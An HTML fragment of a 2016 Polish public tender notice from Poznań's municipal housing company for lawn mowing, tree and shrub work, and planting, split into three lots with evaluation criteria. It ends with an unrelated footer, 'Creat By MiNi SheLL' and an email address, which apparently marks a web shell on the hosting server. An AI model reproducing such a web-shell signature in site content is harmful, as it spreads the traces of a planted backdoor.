<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Aktualny wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, zgodnie z ustawą z dnia 13 września 1996 r. 
o utrzymaniu czystości i porządku w gminach, wydane przez Prezydenta Miasta Poznania.
2. Aktualne zezwolenie na transport odpadów wydane przez starostę właściwego ze względu na miejsce siedziby lub zamieszkania transportującego odpady - na podstawie ustawy z dnia 14 grudnia 2012r. o odpadach. (Dz. U. 2013 poz.21).
3. Oświadczenie ws. powstania obowiązku podatkowego po stronie Zamawiającego 4.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia,
zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udownodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Zobowiązanie winno wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia wykonawcy odpowiedniego zasobu wskazać jego rodzaj i czas udzielenia oraz wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2 b Pzp odpowiada solidarnie z wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty wykonawcy w następujących przypadkach na określonych warunkach:
- dopuszczalna jest zmiana wynagrodzenia wykonawcy w przypadku zmiany powszechnie obowiązujących przepisów w zakresie wysokości stawki podatków od towarów i usług 
na przedmiot świadczenia
Dodatkowo dla zadania II:
-w przypadku zmiany miejsca, do którego należy przewieźć drewno pozyskane podczas prac,
-w przypadku zmiany osób wymienionych w §4 ust.4 umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zkzl.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Komunalnych Zasobów Lokalowych sp.z o.o. ul. Matejki 57, 60-770 Poznań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2016 godzina 10:50, miejsce: Zarząd Komunalnych Zasobów Lokalowych sp.z o.o. ul. Matejki 57, 60-770 Poznań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE I: KOSZENIE TRAWY I PRZYCINANIE ŻYWOPŁOTÓW.
Przedmiotem zamówienia są usługi polegające na pielęgnacji terenów zielonych, tj.:
a) pielęgnacji trawników o łącznej powierzchni 400.000 m2:
b) przycięciu żywopłotów o łącznej długości 25.000 mb:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.34.20.00-9, 77.31.41.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. wykonanie każdego etapu prac w terminie  nie dłuższym niż 21 dni - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE II: PRZYCINANIE DRZEW I KRZEWÓW, USUWANIE DRZEW POWALONYCH PRZEZ WIATR ORAZ WYCINANIE DRZEW I KRZEWÓW I USUWANIE KARPIN.
Przedmiotem zamówienia są usługi polegające na przycinaniu drzew i krzewów oraz usuwaniu drzew powalonych przez wiatr, tj.:
a)	przycięcie 250 sztuk drzew,
b)	przycięcie 2000 m2 krzewów,
c)	usunięcie 60 drzew powalonych przez wiatr..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin dokonania oceny stanu drzew wskazanych do przycięcia lub wycięcia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE III: NASADZENIA DRZEW I KRZEWÓW.
Przedmiotem zamówienia są usługi polegające na nasadzeniach drzew i krzewów na terenach wskazanych przez Zamawiającego, tj.:
a)	nasadzenie 130 sztuk drzew,
b)	nasadzenia 100 sztuk krzewów liściastych,
c)	nasadzenia 100 sztuk krzewów iglastych,
d)	roczna pielęgnacja nasadzonych drzew - 130 sztuk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. nasadzenie drzew o obwodzie 19 cm i większym - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com